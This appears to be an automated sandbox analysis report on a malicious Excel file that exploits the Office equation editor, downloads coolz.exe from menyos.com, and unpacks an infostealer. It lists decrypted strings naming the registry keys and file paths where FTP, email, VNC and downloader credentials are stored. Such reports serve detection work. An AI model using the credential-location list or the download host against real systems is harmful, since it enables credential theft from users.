Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Password=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;User=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Server=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Port=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Port=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Password=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;User=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Anonymous=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FTPGetter
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FTPGetter\servers.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_ip>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_ip>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </server_ip>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_port>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </server_port>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_user_name>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_user_name>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </server_user_name>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_user_password>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_user_password>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </server_user_password>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FTPGetter
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: The Bat!
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \The Bat!
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Account.CFN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Account.CFN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Becky!
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: DataDir
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Folder.lst
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Mailbox.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PassWd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTPServer
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MailAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Becky!
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Outlook
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IMAP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POP3 Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HTTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IMAP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POP3 Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HTTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Mail App
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SchemaId
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pResourceElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pIdentityElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pPackageSid
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pAuthenticatorElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: syncpassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: mailoutgoing
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FoxMail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Executable
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FoxmailPath
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Storage\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Storage\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Accounts\Account.rec0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Accounts\Account.rec0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Account.stg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Account.stg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POP3Host
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTPHost
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IncomingServer
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MailAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POP3Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Opera Mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: opera:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PocoMail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Pocomail\accounts.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POPPass
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTPPass
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: eM Client
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: eM Client\accounts.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: eM Client
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: "Username":"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: "Secret":"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: "ProviderName":"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: o6806642kbM7c5
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Mailbird
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SenderIdentities
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Mailbird\Store\Store.db
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Server_Host
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Username
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: EncryptedPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Mailbird
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: RealVNC 4.x
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: RealVNC 3.x
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\RealVNC\vncserver
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: RealVNC 4.x
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: RealVNC 3.x
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\ORL\WinVNC3
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: TightVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\TightVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: TightVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\TightVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PasswordViewOnly
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: TightVNC ControlPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\TightVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ControlPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: TigerVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\TigerVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: JDownloader 2.0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: JDownloader 2.0\cfg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: JDownloader 2.0\cfg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Paltalk

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 104.21.35.109 Port: 443

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to behavior

Office Equation Editor has been started

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.35.109:443 -> 192.168.2.22:49163 version: TLS 1.2

Source:

Binary string: wntdll.pdb source: coolz.exe, 00000005.00000003.483771153.0000000003970000.00000004.00001000.00020000.00000000.sdmp, coolz.exe, 00000005.00000003.483536666.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036706E2 URLDownloadToFileW,	2_2_036706E2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03670659 LoadLibraryW,URLDownloadToFileW,	2_2_03670659
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0367072D WinExec,ExitProcess,	2_2_0367072D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036705E9 URLDownloadToFileW,	2_2_036705E9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03670673 URLDownloadToFileW,	2_2_03670673
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0367074D ExitProcess,	2_2_0367074D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036705CD URLDownloadToFileW,	2_2_036705CD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036705B4 ExitProcess,	2_2_036705B4

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: menyos.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
